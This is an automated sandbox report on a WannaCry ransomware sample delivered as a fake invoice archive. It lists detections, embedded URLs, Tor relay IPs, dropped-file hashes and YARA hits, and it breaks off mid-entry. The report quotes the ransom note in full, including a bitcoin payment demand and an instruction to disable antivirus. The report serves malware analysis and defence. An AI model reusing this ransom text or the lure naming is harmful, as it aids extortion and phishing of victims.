            C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\tor.exe0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\tor.exe0%VirustotalBrowse
            C:\Users\user\Desktop\TaskData\Tor\zlib1.dll0%ReversingLabs
            C:\Users\user\Desktop\TaskData\Tor\zlib1.dll0%VirustotalBrowse
            C:\Users\user\Desktop\taskdl.exe89%ReversingLabsWin32.Ransomware.WannaCry
            C:\Users\user\Desktop\taskdl.exe88%VirustotalBrowse
            C:\Users\user\Desktop\taskse.exe87%ReversingLabsWin32.Ransomware.WannaCry
            C:\Users\user\Desktop\taskse.exe88%VirustotalBrowse
            C:\Users\user\Desktop\u.wnry96%ReversingLabsWin32.Ransomware.WannaCry
            C:\Users\user\Desktop\u.wnry90%VirustotalBrowse
            C:\Users\user\Documents\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
            C:\Users\user\Documents\@WanaDecryptor@.exe90%VirustotalBrowse
            C:\Users\user\Downloads\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
            C:\Users\user\Downloads\@WanaDecryptor@.exe90%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smail0%Avira URL Cloudsafe
            http://freehaven.net/anonbib/#hs-attack060%Avira URL Cloudsafe
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s0%Avira URL Cloudsafe
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw0%Avira URL Cloudsafe
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how0%Avira URL Cloudsafe
            http://freehaven.net/anonbib/#hs-attack060%VirustotalBrowse
            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&cta0%Avira URL Cloudsafe
            https://sabotage.net0%Avira URL Cloudsafe
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw0%VirustotalBrowse
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how0%VirustotalBrowse
            http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s0%VirustotalBrowse
            https://sabotage.net0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%staskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
              		high
              https://blog.torproject.org/blog/lifecycle-of-a-new-relayError@WanaDecryptor@.exe, 0000003B.00000003.2426018255.0000000002817000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                		high
                http://www.openssl.org/Vtaskhsvc.exe, 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmp, taskhsvc.exe, 00000056.00000002.3025101418.000000006CDFC000.00000008.00000001.01000000.00000010.sdmp, libeay32.dll.59.dr, ssleay32.dll.59.drfalse
                  		high
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw@WanaDecryptor@.exe, 0000003F.00000002.3008943317.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailProforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3006446411.0000000000A38000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.torproject.org/taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                    		high
                    https://trac.torproject.org/8742taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                      		high
                      http://freehaven.net/anonbib/#hs-attack06taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgProforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CLXfQbX4pbW4QbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiProforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.openssl.org/support/faq.htmltaskhsvc.exe, 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmp, libeay32.dll.59.drfalse
                              		high
                              https://blog.torproject.org/blog/lifecycle-of-a-new-relay@WanaDecryptor@.exe, 0000003B.00000003.2426018255.0000000002817000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                                		high
                                http://www.btcfrog.com/qr/bitcoinPNG.php?address=%sProforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3006446411.0000000000A38000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003B.00000002.3003574685.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmptrue
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.openssl.org/support/faq.htmlRANDtaskhsvc.exe, 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmp, libeay32.dll.59.drfalse
                                  		high
                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgProforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/search?q=how@WanaDecryptor@.exe, 0000003F.00000002.3008943317.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000064.00000002.2448697238.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000066.00000002.2451103005.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000068.00000002.2453610363.0000000000421000.00000004.00000001.01000000.00000009.sdmpfalse
                                      		high
                                      https://www.torproject.org/download/download#warningalphabetaThistaskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                                        		high
                                        http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=howProforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000003.2298742785.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000003B.00000002.3003574685.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003B.00000000.2402439775.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000003F.00000002.3003497388.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423523034.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000047.00000002.2414121733.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000048.00000002.2415651692.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004A.00000002.2417260231.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004C.00000002.2419919555.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2421966842.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.2423912919.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.2426218309.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000055.00000002.2428422022.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.2432111038.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000059.00000002.2434382646.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.2435991946.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005D.00000002.2438774612.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.2441978280.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000060.00000002.2444345855.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.2446016776.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000064.00000002.2448697238.0000000000421000.00000004.00000001.01000000.00000009.sdmptrue
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.zlib.net/D@WanaDecryptor@.exe, 0000003B.00000003.2425567276.0000000002711000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmpfalse
                                          		high
                                          https://sabotage.nettaskhsvc.exe, 00000056.00000002.3014680639.0000000003670000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000003.2537858182.0000000004358000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000003.2511720269.000000000482F000.00000004.00000020.00020000.00000000.sdmp, cached-microdesc-consensus.tmp.86.drfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKStaskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                                            		high
                                            https://www.torproject.org/documentation.htmltor.exe.59.drfalse
                                              		high
                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03Proforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.torproject.org/download/download#warningtaskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                                                  		high
                                                  https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$@WanaDecryptor@.exe, 0000003B.00000002.3002673814.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696581201119.12791&key=1696581201400600000.1&ctaProforma Invoice and Bank swift-REG.PI-0086547654.exe, 0000000A.00000002.3012269724.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.torproject.org/docs/faq.html#BestOSForRelaytaskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                                                      		high
                                                      https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip@WanaDecryptor@.exe, 0000003F.00000002.3002671502.000000000019B000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000041.00000002.2423394506.000000000019B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://trac.torproject.org/projects/tor/ticket/14917.taskhsvc.exe, 00000056.00000000.2432380570.0000000000ACC000.00000002.00000001.01000000.0000000B.sdmp, tor.exe.59.drfalse
                                                          		high

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          171.25.193.9
                                                          		unknownSweden
                                                          		198093DFRI-ASForeningenfordigitalafri-ochrattigheterSEfalse
                                                          78.142.142.246
                                                          		unknownAustria
                                                          		8437UTA-ASATfalse
                                                          167.114.66.61
                                                          		unknownCanada
                                                          		16276OVHFRfalse
                                                          77.73.69.128
                                                          		unknownRussian Federation
                                                          		43317FISHNET-ASRUfalse
                                                          80.127.137.19
                                                          		unknownNetherlands
                                                          		3265XS4ALL-NLAmsterdamNLfalse

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox version:38.0.0 Ammolite
                                                          Analysis ID:1375296
                                                          Start date and time:2024-01-16 11:58:01 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 15m 18s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:211
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Request for Quotation (RFQ_196).zip.zip
                                                          Detection:MAL
                                                          Classification:mal100.rans.spyw.evad.winZIP@985/1012@0/6
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 69
                                                          • Number of non-executed functions: 293
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .zip

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, VSSVC.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadFile calls found.
                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          11:59:27API Interceptor358228x Sleep call for process: Proforma Invoice and Bank swift-REG.PI-0086547654.exe modified
                                                          11:59:39API Interceptor2x Sleep call for process: @WanaDecryptor@.exe modified
                                                          11:59:41API Interceptor1x Sleep call for process: WMIC.exe modified
                                                          11:59:53API Interceptor1x Sleep call for process: dllhost.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\@Please_Read_Me@.txt

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Yara Hits:
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                          C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048856
                                                          Entropy (8bit):7.99982687688155
                                                          Encrypted:true
                                                          SSDEEP:24576:KBgjcAcw1KVmp5wViqcMocuc1sp7mVCDobtOwhkb0HT1W9mtq:4gj0mKVkMiqP8c6pehkb0Wmtq
                                                          MD5:8D7493BEB6503C2D0ECF14991C18D5E3
                                                          SHA1:95EEC156A4F2115FD702D7F335ADBA729A8457D1
                                                          SHA-256:B2BE7E5FF084D767AC716FB81998C51BC970A6A7016A450E3EB149302C6D6C7D
                                                          SHA-512:67AA8834DC3531906A5EA472736DD82C9BBBBB8E6F2266250D664E15DDBDA1C352471E7752E4C9300B1F8ADB11B34C0DD6EAF2608308ACAA22500273C7A06A44
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....=.8.H,L...ti.....|...b0.U..J....?..8.$.A...O....!e@..7....0R.L.0.2g.....j.}..4.U..............i+{..G..YY.&.,...X.#!...K...56i.8..8...d.Zz..`.I......Q..h.Z?.tVI..e.*...#.../.s.k......=m...g....U7..>...>.?Oho.%...u...jZ..N.C.i7...f..o...y.32\...............I...\I..X.....+.#...1...z...{J.Qh....._J.....!k.p.c#aO.uE.f..{......~...H.l.}..+`qr.&.o5Y....)..I..I."L..F ...D..".2..E..L.Q..l_r...z...g..x..4....ks..pZ~.-.....>7..4.....g>9.......lX.k......[..e.K.7...9y._..n.......q.O>..?.n./..q...j...../...~4....Q.9:.bP...]%.....TS...K...@..ms^N..F....H..2j)(.3.j.......W.. ...5.DO..+(..>....,.(..=.?..k8.1.......f.-..X4.$..x..A.B....W:.&..5...`.... ..3z...M$..c..3..7.t(..[4.z..Or.c/.X6.......x.ei..m...L..t.i..P..Y..Q..1b...."-?.bp..SO.19.t.*.).W.............d]<X...p..A..........{DIt...J..UM.E......gB..x.c'.1..0..O..k....d-..........6..Q........1G.Sv$........M.*[.`.gOT...c..k.......Fb....[..........P......X..\=p.0BJ;.5.!A.m..<"..A"...X~.$-

                                                          C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
